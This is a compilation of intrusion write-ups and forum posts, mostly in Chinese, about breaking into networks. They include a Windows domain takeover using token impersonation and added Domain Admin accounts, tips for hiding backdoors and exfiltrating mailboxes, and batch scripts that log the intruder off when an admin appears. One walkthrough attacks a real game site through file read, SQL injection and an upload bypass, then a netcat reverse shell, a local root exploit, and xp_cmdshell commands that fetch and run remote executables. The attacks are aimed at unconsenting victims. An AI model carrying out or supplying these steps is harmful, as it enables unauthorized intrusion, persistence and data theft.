Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP’s or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Aquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:WINDOWSsystem32>net localgroup administrators
net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and unrestricted access to the computer/domain

Members
--------------------------------------
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins

C:WINDOWSsystem32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name   Domain Admins
Comment      Designated administrators of the domain

Members

---------------------------------------------------
admin_valsmith      Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.

c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found...

Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith

Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd

[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf

simeon
Citrix系统以前听说过，未真正操作过，对于Citrix系统的研究来自与好友Mickey的指导，后面对此进行了一些研究，应该说小有心得，撰文与大家一起分享。
一、Citrix简介
Citrix是Citrix Systems, Inc.的一款主打产品，该公司主要提供全球接入架构解决方案，其解决方案能够让客户在任何时间、任何地点、在任何设备上，通过任何形式的网络连接，高效 获取各种应用、信息及通讯。Citrix技术使得数字办公室无处不在，令工作轻松易行。　　 Citrix以代号CTXS于Nasdaq Stock MarketSM上市，并获列入标准普尔500指数。2001财年公司总收益为5.92亿美元。Citrix 总部设于美国佛罗里达州 Fort Lauderdale，公司网站 http://www.citrix.com。
Citrix是一款广泛流行的远程桌面控制程序，类似于Microsoft的远程终端（Terminal Services）。只是其原理不同，Microsoft Terminal Services使用的是RDP(远程桌面协议，Remote Desktop Protocol)协议，而Citrix使用的是ICA (独立计算机架构，Independent Computing Architecture)协议。ICA技术已成为基于服务器计算模式的工业基础。ICA包括了包括以下三个重要内容：
阅读全文...

去年我介绍过一个HASH注入工具：内网渗透新杀器，这里有个简明用法

作者：BlAck.Eagle[B.H.S.T]

（前几天写的个总结，方便记忆）结合新出的内网渗透工具wce来讲解下pass-the-hash技术，就是我们平时说的HASH注入。

1．
为什么要进行HASH注入？

Hash破解不出来或者省时省力

我们先简单的看下原理:

阅读全文...

本文阐述：文章从网站入侵到内网渗透提权，作者给大家带来了一篇精彩的内网渗透文章。读后此文你能清晰的认识到内网入侵的细节技术。

由于平时比较忙，用了很久的VPN肉鸡飞掉了，近来正好有时间于是打开google搜索upfile.asp开始找肉鸡，来了台湾某XX站，http://xxx.xxx.tw/xx/upfile.asp，为了不必要的麻烦，我隐藏了敏感内容。直接到传asp提示错误，那么直接传了gif以后，查看上传路径发现自己重命名了，如果没有重命名的话在IIS6下百分之90以上可以拿shell了，除去目录末有执行脚本权限。最后抓包分析改上传路径，最后得到一个shell，图1。具体方法翻翻以前杂志或google找吧，一找一大堆。

执行命令后，发现权限还比较大，能够执行一些简单命令，像net user、ipconfig /all等等。。

阅读全文...

在进行内网渗透，尤其是在比较大型的网络环境下，很可能会遇到域这样一种特殊的网络环境，而在域环境下的内网渗透又将是另外一片天地。
首先还是先简要看一下域的概念吧：
域 (Domain) 是Windows网络中独立运行的单位，域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后，2个域之间不但可以按需要相互进行管理，还可以跨网分配文件和打印机等设备资源，使不同的域之间实现网络资源的共享与管理。
域既是 Windows 网络操作系统的逻辑组织单元，也是Internet的逻辑组织单元，在 Windows 网络操作系统中，域是安全边界。域管理员只能管理域的内部，除非其他的域显式地赋予他管理权限，他才能够访问或者管理其他的域；每个域都有自己的安全策略，以及它与其他域的安全信任关系。

通过上述的了解，我们可以知道域管理员的权限是相当大的，域管理员可以通过持有域的登陆票据从而实现对域内各个计算机的远程管理，即有权限登陆任何一台机器。那么在渗透的过程中我们就可以通过某种方式记录下管理员登陆的密码，当然了，这只是其中的一种思路。
阅读全文...

1你的内网入口机器属于什么性质？例如：24小时运转的应用服务器、测试机器、员工办公机器、VPN？
根据你的回帖，可以得知，你目前既然已经拥有了数台内网服务器权限，那么应该是通过其内网反弹后门转发端口进入内网，我估计是应用服务器。而初期可能是通 过员工办公机器或者对方映射到公网上面的应用服务器进入内网的。

2此内网数据存储服务器属于几级内网？这个问题你未具体描述，因为往往会遇到1级、2级、3级甚至更深的类城域网结构。
这里假设你遇到的只是最初级的1级内网，既：内网可互通

3你目前行为的目的是什么？你描述说你需要将数据拷贝出来，但你又回帖说搞定了他们几台服务器，那么我的问题就是，根据你最后一次的回帖，不太明白你目前 的状况。A你无聊？B你还有其他目的？C你还没有搞定那台或数台数据储存服务器？
你不回答清楚，无法帮你参考啊。各种情况下，有不同的解决方式。
这里就仅认为你已经搞定数据储存服务器、并且只是基于成就感继续KO他们的服务器吧。
阅读全文...

cisco安全情报中心发 的一个文章，原文标题是“Infiltrating a Botnet”，为了照顾各位的用户体验，我翻译成“渗透一个肉鸡网络”：）大致看了下，应该是伪装成肉鸡进入server，然后窃听肉鸡老板相关交易信 息的一个过程，挺有意思，相信玩bot的朋友在很久以前就中过这种道。

Overview

Many teams at Cisco are dedicated to security research. One team recently investigated botnets with the goal of improving existing detection methods and discovering the techniques botmasters use to compromise machines. The team’s efforts were rewarded through their protection of an important customer’s network. Their discovery efforts also yielded extraordinary insights into the mind and motives of a botmaster. This paper discusses exploit protection and reports on the interviews the team held with the botmaster they encountered.

Defending a Customer from a Botmaster

Typically, administrators patch vulnerable machines or deploy some sort of intrusion prevention system (IPS) to protect against exploits.  Both approaches are effective the majority of the time, but neither approach protects systems against the uneducated user.  These approaches may not even protect people who take their machines home if the IPS is network-based. The user who will click and run anything is the greatest threat to any network.

Internet relay chat (IRC) traffic on non-standard ports is a good indicator of malicious activity. Simple botnets often use IRC as a command-and-control framework because the source code is readily available. Joining a chat network is not botnet activity, but it is usually not work-appropriate activity. Cisco offers a service that monitors and manages network-based IPS. By monitoring certain alerts from this data feed, suspicious IRC traffic was easily found.

An Unsuspecting Customer

A Cisco customer was unaware of dozens of compromised machines. A tremendous number of alerts including IRC activity, far larger than anything that could be benign, were occurring on the customer’s network. The traffic from several machines stood out from other systems on the network. There are occasionally oddities in a network, but when a small subset of machines is observed sharing the same odd behavior, researchers should take note.
阅读全文...

1.web,sql分离(sql上网),sa. 读系统用户密码或加用户反弹,种反弹型后门.

2.web,sql分离(sql不上网),sa. 把和防火墙和策略有关的服务或进程kill掉再测试是否上网 收集尽量多的密码表.sqlsniffer findpass gethashs ipc$猜web密码 vbs读系统日志查看管理员登陆IP 有可能的话导出注册表的secpol查看策略规则.


3.web,sql分离(sql上网),dbo_owner. 猜密码进web后台. 备份hta到启动项

4.web,sql分离(sql不上网),dbo_owner.猜密码进web后台.

(重点在4,在opendatasource的时候不要以为弹不到外面的1433就不上网了,可以尝试其他的端口 比如20 21 25 443 445 80等防火墙经常开放的端口)

作者：Firefox

帮朋友忙 帮到目的不单纯 好可怜 被好多兄弟教训了
甚至被威胁了下...
总结下 教训...
关于单臂路由如果掌握到设备权限还是可以继续玩，另外一些对拨的vpn如果没有做好限制也可以溜达溜达，如果是帮忙的话 还是小心翼翼的溜达，不要做什么很实际的操作了，因为...

先说设备
IPS IDS 自然不说了 现在这些都搞复合呢 all in one 行为管理也有给复合进去的
在说流量报警和时间 流量报警现在和手机整合的 就是说如果在一个日均1Gb流量的网络下载一个大家伙流量超出界定范围会被发送到手机流量异常，说到手机这个东西现在的确发达了，有时候发邮件也要先搞清楚对方是不是手机在收，不过有些人貌似有手机软件的0day ...
然后有比较业务化的一些规则 比如行为+时间 这样算因子？或者还有更多因子的 比如在9:00-17:30之外玩个IPC$或者ftp外部再或者发个邮件，那么又被记录了...

说到这里好像记得电子科技大学一个老师讲那个搞某大公司的牛人将搞到的东西分成NNNN个份更改为容量不大于某值的.gif,然后每天定时定量分多次下载... 回想自己好像根本就没这方面的意识...这次丢人丢大了
说说这次吸取的教训和累积的经验，当然主要是对一些相对严格的网络环境

1、不要采用相同的留后门的方式
虽然自己平时也不用后门，但是有时候为了方便还是要装下，这个时候对自己占领的土地一定要分块分类型来安装后门，如果手法只有一种那么很可能被一次扫地出门（这点感谢叮当给的意见）。

2、留后门也要看人
留后门选什么样的机器也是一种学问，如果找一个CTO的机器给他屁股上开个洞他会很敏感滴，这次我被cto猛揍了一顿，选一台边缘机器吧，比如财务菜鸟...比如公共用的上网机..

3、时间很重要
在拿到某设备权限后看到一张自己创造的流量图，我竟然搞出在对方的凌晨1点web上流量峰值和下午5-6点的值竟然持平，所以以后要养成习惯，先分析设备，分析时差，然后再考虑下一步的动作。

4、别映射磁盘了
这个不多说了，映射很容易被发现，太明显了，还是dir来看吧，看到想要的xcopy回来好了，这样至少安全点。（这点感谢"九局下半"这个名字是艺名，复ID）。

5、关于vpn
一些对拨vpn设置比较变态，但是如果分析清楚架构是可以穿透这些限制，当修改这些配置的时候应该先停止设备通知，再备份配置，添加直接入口，最后再改设置，这样可以保证自己搞错时还有机会更改。

6、熟悉服务
熟悉网络后要熟悉服务，这样挑选对方主要网络服务，主要软件，然后在fileserver上做些手脚，当然时间要克隆一下，也别动太疯狂了，另外切记选好目标，不可以随便找个adobe的pdf浏览器下手，如果遇到负责的管理员，adobe更新软件之日就是那特洛伊的忌日了，。

7、找找同行
这个情况很常见，这次也遇到了，这时最好是分析分析和我奋战在同一服务器的兄台什么时间来玩、怎么玩、玩了之后留下些什么，这样当自己再也无法闯进去的时候、或者这位兄台不仗义把我一脚蹬出去的时候，我还可以拿他钥匙再来坐坐。

8、邮件&文档
选择好时间，尽量在不触发设备规则的时候把pst文件和重要文档down了，另外在清理自己痕迹前最好先把服务器日志完整down一份，方便以后分析。

扯了这么多都是这次吸取的教训，血泪的教训...
贴士:
今天看到一句话,很是崇拜
"一个人什么都会就意味着什么都不会；当你觉得自己一无是处的时候离成功才最近"

作者：逗号

- -! 来了TOOLS 这么久还没写过东西现在给大家贡献点东西
当你在渗透中挂机嗅探的时候，如果管理员上来发现就不好了所以有了这个bat 的用处
检测管理员上线注销自已的 bat
copy 保存为 xx.bat

@echo off
:check
choice /C YN /T 10 /D Y
quser | find "#16"  && del xx.bat | logoff
goto check


说明一下
#16 每次运行这个 bat 的时候先quser 一下，看当前的会话id 是多少，然后加1 每连接一次就会加1
用户名 会话名 ID 状态 空闲时间 登录时间
administrator rdp-tcp#22 2 运行中 . 2009-4-16 19:24

你要把这个给改成 #23 就可以了 然后下一个连接进来的时候就会注销自已

哪位牛帮忙改一下，判断 如果 比 rdp-tcp#22 大的连接进来的话就注销自已
choice /C YN /T 10 /D Y
/T 10 是 10 秒一检测 这样是为了不太占CPU
by dh
为了渗透的方便，顺便帖上一个很淫的人写的一个 bat 方便大家
嗅探中当机的一点点启示
by chong
很多朋友在嗅探的时候肉猪一不小心就挂了.那个后悔啊.....
当然 你要选择尽量少的服务来嗅.比如你要嗅目标的1433及80.那你嗅其他的就没用罗.
这样会大大的减少当机的可能性.如果看到丢包率超过10%就要注意啦. 赶紧停掉,看看那里没设置好吧.
如果还是不小心挂了呢.
没事.这里为您准备了一个BAT 在开嗅的时候运行它就行了哦.
======start=========

:ping
choice /C YN /T 120 /D Y
ping g.cn
IF ERRORLEVEL   1 GOTO reboot
IF ERRORLEVEL   0 GOTO ping
:reboot
shutdown /r /t 0


======end=========
这里的g.cn你可以设置为网关的IP或你的IP
如果能ping通的话就继续ping 如果不通的话就认为当机了 (当然.你要事先测试下)
那.就重启罗. 或自己写一些语句 像结束cain等.自由发挥

作者：randy
来源：火狐技术联盟

目标:JP

类型:某官Game

服务器 linux

网络环境:20.*.*.*内网组成.路由映射端口.

本文只是给思路.难免有错大家谅解 希望大家能耐心看完.本人只是鸟一只.
=============国界===============

好了废话少说开始.站的URL我就拿www.test.com代替.本来想让大家都体会一下.可惜狐狸窝不能发真实地址.
拿到了站大概看了一下.PHP LINUX APACHE MYSQL组成.貌似还有一处用了一个让我无法决定的数据库.首先我们从
整个站的结构开始了解. 拿出WWWSCAN 由于我经常检测国外的站我收集了很多敏感的目录文件等等 当然软件作者
也收集了许多有用的.结果返回大概目录有
/admin/
/config/
/news/
/news/newadmin/
/news/newadmin/test.php
/admin/test.php/info.php
省略..
有用的就这些.因为我最想要的就是后台.至少有了管理员的USER&pASS有了能用的地方.
admin目录访问提示403 newadmin出来一个登录页.丫的开心.请出GOOGLE.
site:test.com inurl:php
site:test.com admin
site:test.com login
site:test.com filetype:php | asp | jsp | aspx | jsp | 由于是想看看其他子站有没有WIN系统.这样好插手.结果只有PHP 而且子站大多都是有HTML组成的
搜到这些大概得到了些信息.大概看到了网站组成脚本的名称 心里感觉可疑的可以注的点.还有一些比较少见的页面.大家SEACH下会有这样的感觉的
打开工具箱.有个FUCKGOOGLE.exe 可以搜集所有GOOGLE搜到的URL 做成一个HTML给你.然后很多链接.大家可以在AD注入工具里打开这个页面让AD扫.
就算AD不是注MYSQL的.至少也分的清楚AND 1=1 和AND 1=2的区别.在AD放了10分钟后看了下结果.没啥好玩的...放弃GOOGLE.{注:这其中大家一定得耐心的观察}
好了没戏了.既然ADMIN目录403就从他那开始下手.随便猜了几个登录页面.RP问题没出来.在WWWSCAN跑了一下 啥都木有..汗. 放弃...
新闻系统啊 新闻系统..你咋就是个新闻系统咧.后台至少可以让我用溯雪跑一下.就算不科学 也碰碰运气... 跑完了没戏 {注:当然在这过程中你可以做其他的)
有了后台我怕 就是认证的问题.到处找点.一直都没找到.有个VOTE.进去看了一下...谁谁谁 %xx. GET了' 出错了.PHP送给我路径. and 1=2 返回结果正常.和1=1没啥区别.汗.再来
/**/and/**/1=2 还是一样 大家当我在放屁吧.放弃 继续找.... 找啊找..突然看到了个这么个URL read4.php?files=include/hellokitty.html 这么个连接. 去掉hellokitty.html PHP提示
Warning: Smarty error: unable to read resource: "include" in in /home/httpd/html/libs/test.php on line 1095
嘿嘿 爽了.接着我随便找了一个他们站的图片 提交 read4.php?files=../img/bar_logo.jpg 嘎嘎. 返回的结果是?JFIF
ddDucky
<Adobed
省略....
好继续.提交read4.php?files=../read4.php 返回
require '../libs/xxxx******(假的).php';
include 'sqlfunc_csm2.inc';
session_start();
.....省略
有进展继续.提交read4.php?files=../sqlfunc_csm2.inc
拿到的当然是MYSQL USER&pASS啦.前提不是ROOT.
好了.虽然没找到点至少找到了一个另类的load_file.不管3721继续攻击!!!
read4.php?files=../../../../../etc/passwd
当然出来咯.找了几个有/BIN/BASH的用户 用MYSQL的密码去尝试SSH结果失败.
不急.再来.我们必须得找到点.花了一个小时的功夫....
还是没找到点.无奈之下用MAXTHON查看源代码.就是表单啦.搜索php 啊.无意中搜到一个很奇怪的页面我在GOOGLE中也没见过 好像是调用的吧.无聊
具体是../dj?msb=908 好家伙打开它...返回让我一滴汗落下来...就出来个3456.最后我才发现这个页面为了统计用户访问的次数.
加了个'出错了. 1=2 1=1. ^_^ 功夫不负有心人. 我注我注我注.我直接注死.
and 1=2/**/union/**/select/**/1,2
好了 返回正常...
and 1=2/**/union/**/select/**/1,user()
返回刚才我暴出来的MYSQL.有些朋友就问了.你都拿到MYSQL密码了.你怎么还不去连人家数据INTO FILE呢?大哥我希望您看清楚.上面我说的结果20.*.*.* 影射..多的废话我不想说.
and 1=2/**/union/**/select/**/1,database()
没错喔.出来的和暴出来的库一样.看你丫的我咋玩你.万事齐全.就是管理员帐号和密码了.
问题来了.表名....这个简单啦.用刚才暴文件的方法去暴login.php或它所POST的文件就可以找到表明了.大家懂我意思吧.继续注
and 1=2/**/union/**/select/**/news_admin,news_password/**/from/**/administrator55991 (BT吧 管理员很有意识)
暴出来了.密码是BASE64 大家可以到http://makcoder.sourceforge.net/demo/base64.php 来解开.或者用CAIN的附加功能.或者一会我给大家发个编码工具非常好用.
好了.拿到帐号密码了.进入后台.编辑新闻和发布新闻.其他的说了浪费时间.当然有上传功能啦.乐呵呵的上传个php. ...
.....
神啊救救我吧.我都够麻烦了..
必须上传JPG或GIF.我砸电脑的念头都有了...
稳定稳定..继续...先找了一个真正的图片.后缀改成.fuck 上传!! 提示成功.看了下上传的后辍.没错.是.fuck.
娘地.原来破东西只检测GIF头.再来.在C99头上加个GIF头GIF89a 上传!!!!
失败!!!!!!!!!!!!!!!!!!!!!
稳定下..传了个加GIF头的JSP和CGI.上传成功 不过人家服务器不解析.
一根烟 出去呼吸一下新鲜空气.突然抽烟的时候灵光一闪...对了!!!
上传后缀为.pHP带GIF头的马儿...哇塞!!!! 成功咧.爽.{注意大家看清楚.PHP Php pHp等等的组合方式 具体原理我就不解释了.各位牛都都知道.速破黑(SUPERHEI)的文章有写
输入密码进入WEBSHELL...既然进来了.我们就搞个顶翻天.
这感觉真好啊.555555.进来以后上传个NSTVIEW.php 进入TOOLS选项. 有个BACKDOOR. 本机执行nc -vvlp 520
点下Start 回来了个SHELL. 好开始提权.拿到肉特....
提交id
nobody.
提交uname -a
废话 不然APACHE白做APACHE啊 白痴!!! -.-
linux 2.4.20 xxxxxxx
其实这中间也很巧合.可能运气好吧.我用brk.c 成功提到肉特...
brk.c 大家可以去www.milw0rm.com seach下...
开始提权...
$gcc brk.c -o brk
$./brk
.....省略....
#sh.x.x
好了.继续.
nmap -v -sS 20.1.0.1/16
返回一大堆.有一台WIN机器.大概是2K.LINUX使上不舒服.先搞定他吧.
开了139 445 1433 3389 5900
#netstat -an
发现这台机器还连接着那台2K的1433 狂喜...
记得前面的ADMIN目录吗?403那个...我大概看了下那个目录的文件仔细观察看.include sql.php 紧张的打开sql.php 哇/se/se/se 运气实在好的不行了..
是SA喔.但是问题又来了...APACHE+LINUX不支持MSSQL啊.我又是菜鸟一只.又不会写PHP... GOOGLE了下搜到了好东西
freetds. LINUX管理MSSQL的工具. 赶快下载下来安装
# wget http://xx.xx.com/freetds.tar.gz
# tar -zxvf freetds.tar.gz
# cd freetd./configure --prefix=/usr/local/freetds --with-tdsver=7.0
#gmake (生成Makefile，我试验过，make也可以)
#gmake install (安装)
OK了.继续
#cd bin
#./tsql -h 20.1.0.9 -p 1433 -U sa -P XXXX98#4 登录成功后会出现>
>exec master.dbo.xp_cmdshell net user Randy xxxxx /add
>exec master.dbo.xp_cmdshell net localgroup administrators Randy /add
>exec master.dbo.xp_cmdshell ftp 12.12.12.12 | "Randy" | "121212"|"get down.exe"|"bye"| 我就省略的写了...具体是那个FTP的BAT.大家都知道吧.
>exec master.dbo.xp_cmdshell down.exe http://www.xx.com/vidc.exe VIDC大家都会配置吧.
>exec master.dbo.xp_cmdshell down.exe http://www.xx.com/vidc.ini
>exec master.dbo.xp_cmdshell vidc.exe (执行之前 本地执行 vidc.exe -p 7777
>exit

好了.VIDC的端口
也映射过来了.链接本地的127.0.0.1:7777 进到终端.安装CAIN 开始SNIFF.
那服务器也没人管.1天半后.嗅到了SSH的密码.ROOT $*2323****
全段都是相同帐号密码.就这一台WIN. 就这样网关帐号密码.SSH 等等 更别提数据库了.全让我干了顶朝天...
具体文章里用到的工具大家可以找我要 hellrandy@Homtail.com QQ:686641 Randy
文章难免有错...可能思路比较幼稚...或者别的.反正我人也小.大家凑合着看吧.转载请注明版权.

from;网络

一、踩点

ping www.xxx.com 发现超时，可以是有防火墙或做了策略。再用superscan扫一下，发现开放的端口有很多个，初步估计是软件防火墙。

二、注入

从源文件里搜索关键字asp，找到了一个注入点。用nbsi注入，发现是sa口令登陆，去加了一个用户，显示命令完成。哈哈，看来管理员太粗心了。先上传一个webshell，上传了一个老兵的asp木马，接下来的就是个人习惯了，我平时入侵的习惯是先上传webshell，然后再把webshell提升为system权限，因为这样说可以说在入侵之时会非常的方便，我个人觉得这个方法非常好。

三、提升权限

先看哪些特权的：

cscript C:\Inetpub\AdminScripts\adsutil.vbs get /W3SVC/InProcessIsapiApps

得到：

Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"

把把asp.dll加进去：

cscript C:\Inetpub\AdminScripts\adsutil.vbs
set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32
\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32
\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"

然后用asp木马加个用户，显示命令完成。

四、TerminalService

接下来就是开3389了，用net start显示，发现已开了TS服务，但端口上没有3389，觉得可能是改端口了，但事实上它们欺骗我的感情。

我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。算了，上传个木马吧，上传了一个改了特征码的20CN反弹木马。然后用木马在GUI 下关掉了防火墙，再用3389登陆器登了上去。这里我这样做是因为我知道管理员一定不会在旁边，而对于这个时候，比较老道的方法大家可以用fpipe实现端口重定向，或者用httptunnel，和黑防里面说的那样，不过我试过没有成功过一次。还有一种工具是despoxy，(TCP tunnel for HTTP Proxies)，大家有兴趣的话可以去试一下，它可以穿透http代理。

五、简单后门

1、改了FSO名，这样是让我自己享受，这个有system权限的马儿。

2、放了几个rootkit和几个网络上少见的后台。

3、我个从是不喜欢多放后台，觉得很烦。

六、sniffer

1.TS界面下，down了些嗅探器。先ARPsniffer图形的看了一下，没有一台内网机子。又看了一个外网，整个IP段都是。看来我的运行不错嘛。打开webdavscan查了一下，只有两三个IP是网站，而且是很小型的，接下来就没有什么动力了。